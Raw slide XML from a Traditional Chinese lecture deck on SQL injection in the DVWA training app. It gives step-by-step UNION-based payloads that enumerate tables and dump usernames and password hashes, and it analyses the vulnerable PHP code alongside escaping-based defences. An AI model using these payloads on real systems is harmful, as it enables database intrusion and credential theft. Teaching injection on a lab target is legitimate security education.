              <a:t>1' and 1=1 union select user, password from users#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43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566808-4482-4193-A72C-F19ADD9A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973817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各種不正常輸入結果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D67B6-730F-4178-A350-C6F603928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8942"/>
            <a:ext cx="12192000" cy="5519057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1‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>結果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’ and 1=1#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>結果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輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’ or 1=1#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>結果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31ADE3-C131-44C2-81E0-19D8EFD2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35" y="2168751"/>
            <a:ext cx="10250330" cy="27626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1BE093-F172-4A69-B1CC-2AE9B628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10" y="3342027"/>
            <a:ext cx="1961250" cy="75432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679BCF-03AC-411F-9109-B7653567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05" y="2664505"/>
            <a:ext cx="2184406" cy="4020975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E65767F-592C-4D38-BCD9-48E39AA111EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5573555" y="3861290"/>
            <a:ext cx="636815" cy="114379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353A78-4179-4EDB-B8C9-DE39BBB9BB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234513" y="3997487"/>
            <a:ext cx="6076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存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>得到所有使用者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>name,Surname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的資料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FE52085-4C12-4981-B2EB-F9238D5BC35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234513" y="3997487"/>
            <a:ext cx="5957487" cy="8309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5CD4F1F-4308-43F4-882E-AC7961A68AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752929" y="3287976"/>
            <a:ext cx="730048" cy="754327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A000C68-7D27-49E6-9986-F1E1E7B1577B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766901" y="3300189"/>
            <a:ext cx="76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VS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0862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FDF59-0659-45EF-B2AC-172844C8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altLang="zh-TW" dirty="0"/>
              <a:t>1' and 1=1 union select database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The used SELECT statements have a different number of columns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1' and 1=1 union select 1, database()#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4AE24D-128F-4431-8320-49729ED7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4" y="1101142"/>
            <a:ext cx="7660947" cy="76951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8CCA4F-564D-4075-B5E6-380014D2283C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="506186"/>
            <a:ext cx="9519557" cy="473528"/>
          </a:xfrm>
          <a:prstGeom prst="round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F127BA-A4BF-4CFE-94BD-09353128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1" y="4223119"/>
            <a:ext cx="4406598" cy="198173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B1EB93B-BE42-4447-8062-7EC700E85CF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1883228" y="1870657"/>
            <a:ext cx="4212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Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>要有一個以上的欄位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>但還不知道要幾個，持續嘗試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698AB8-E1B4-4DF7-B556-B38614E1B8FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766206" y="1847200"/>
            <a:ext cx="4446815" cy="914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F4C8B7-A115-4E01-A509-2A5927744420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806191" y="4751614"/>
            <a:ext cx="4271995" cy="1453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1D40D28-DC9F-43F0-82E2-2BE0CE22BD17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5813295" y="5054116"/>
            <a:ext cx="565409" cy="702742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FBF87C-5317-4CC1-AC0E-81A6E66B8D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979210" y="4925861"/>
            <a:ext cx="2829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要有兩個欄位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>資料庫名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>DVWA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A11B1DC-E654-46C0-A1A9-2122D27C1B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6704594" y="4751614"/>
            <a:ext cx="3353806" cy="1273629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45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88D872A-A830-45E5-87E2-470EF073D0DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="386834"/>
            <a:ext cx="1219200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DVWA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資料庫有幾個資料表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C964ED-3915-4F94-B6DD-E679820F665C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440872" y="1033165"/>
            <a:ext cx="108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kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1′  union select  1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=database() #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D30005A-DB2B-41ED-9CC8-88B6C26A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18" y="1402497"/>
            <a:ext cx="10227448" cy="1551009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5C0C0B4-4C62-416E-8FCE-8A20AB21DB26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616529" y="2628900"/>
            <a:ext cx="1534885" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="round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18FC7-135E-41E6-BFE8-B6345C12128D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1387929" y="3119375"/>
            <a:ext cx="4512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兩個資料表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>guestbook,users</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1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CD406FC-3ABC-4977-BC19-0786F453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18" y="4439551"/>
            <a:ext cx="10270211" cy="138528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7E6CA8-E8E1-464B-8285-FC2CB40E1E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3811664"/>
            <a:ext cx="1219200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users</a:t>
            </a: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資料表有幾個欄位</a:t>
            </a:r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28E20C-2C23-46B0-A3CC-E0EFA9D53120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092326" y="5796788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n-ea"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>資料有需多欄位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea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F519C1B-D7D9-4D7D-8B1C-03F1906F1511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092326" y="6268233"/>
            <a:ext cx="941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user_id,first_name,last_name,user,password,avatar,last_login,failed_login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8766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034816-8863-4B6F-8209-C659631F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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' or 1=1 union select * from users #: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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The used SELECT statements have a different number of columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' and 1=1 union select user, password from users#:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern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531BF70-AF41-4152-81DC-85E49DB4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56" y="996043"/>
            <a:ext cx="6787459" cy="4483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57427C4-A934-41FA-B78C-83D82AAB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30" y="2508688"/>
            <a:ext cx="5389807" cy="4169697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FE168843-C042-4BBF-89D7-4F42F01641CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280801" y="3919563"/>
            <a:ext cx="930728" cy="84908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A840AEB-F8C8-497A-BD98-D962234F7737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334256" y="3053443"/>
            <a:ext cx="5562994" cy="3592285"/>
          </a:xfrm>
          <a:prstGeom prst="round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E3E4D96-D701-4679-9E07-30D506FEAF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7080126" y="4245429"/>
            <a:ext cx="494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Select user, password from users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86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5B2BC-EBF5-4783-85F8-2A6A729A4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/>
              <a:t>1‘ or 1=1 union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id,first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(password) from users #: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得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資料表中所有用戶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C9906A-3BF5-417A-B111-85BAB02B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7" y="1085849"/>
            <a:ext cx="12194437" cy="425359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93323E1-6143-41D9-AAC6-FCCA28917D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1085849"/>
            <a:ext cx="10322094" cy="3510642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4574"/>
            </a:avLst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484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5E405-C40E-4FF7-9107-A384BB11F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1256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PHP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漏洞程式碼分析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309632-42BB-4947-8825-FB1725CA6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06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// Get input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   $id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>= $_REQUEST[ 'id' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Check database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   $query  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>= "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'$id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>';";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"],  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) or die( '&lt;pre&gt;' . ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>is_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"])) ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]) : (($___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()) ? $___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> : false)) . '&lt;/pre&gt;' );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DF5DD4-E93E-4EF8-9A00-625389B2A151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5423972" y="1513567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沒有檢查使用者的輸入就直接做查詢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F4D5C6B-221A-4DFF-860A-0A42001AFDCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950444" y="1393598"/>
            <a:ext cx="473528" cy="80010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BD036B1-3B0C-44E3-BB37-92B77A50D515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440300" y="1393598"/>
            <a:ext cx="5913500" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1071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11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13D15-8238-4064-B677-D0C2F4EC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5076"/>
            <a:ext cx="12192000" cy="97381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如何避免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Injection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漏洞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[1]?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6B3129-5FAC-480B-8944-ED32053C8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8432"/>
            <a:ext cx="12192001" cy="387758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solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4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altLang="zh-TW" sz="4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zh-TW" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4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TW" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4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altLang="zh-TW" sz="4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zh-TW" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty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zh-TW" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>函数 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400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68686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3591E-7B00-4930-945C-91A3EC5B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905"/>
            <a:ext cx="12112656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6000" b="1" dirty="0"/>
              <a:t>DVWA_1.10_medium</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6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6C8C81-B542-4B4E-B250-4DACA8199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613" y="5675749"/>
            <a:ext cx="5467773" cy="55834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dirty="0"/>
              <a:t>沒有輸入框，只有下拉式選單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E792CE-916D-41B1-A87C-9672FC5C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41" y="2014782"/>
            <a:ext cx="7713374" cy="345506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51862A0-A25C-4A75-B355-0CDB3F7915EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037114" y="2680956"/>
            <a:ext cx="1191986" cy="2122714"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1118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4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21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網站的資安威脅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364" y="892175"/>
            <a:ext cx="6689271" cy="525689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/133944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A5874F-5A8B-483A-90A7-2430F563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302" y="1474278"/>
            <a:ext cx="7759396" cy="53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18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0EC3B-F303-463D-9D79-284748F2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6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sz="4400" b="1" dirty="0"/>
              <a:t>DEMO:: SQL Injection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FF08B-E4DF-432B-8386-6F053EE0E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6043"/>
            <a:ext cx="12393386" cy="5666014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mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函數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1DB39BC-AA5D-467A-9083-350B2878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764"/>
            <a:ext cx="9868890" cy="48432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D08C57-2BF5-49D4-901F-8EA5671BE28B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921825" y="1520206"/>
            <a:ext cx="8431975" cy="13234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$id = $_POST[ 'id' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>$id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>"], $id);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$query  = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
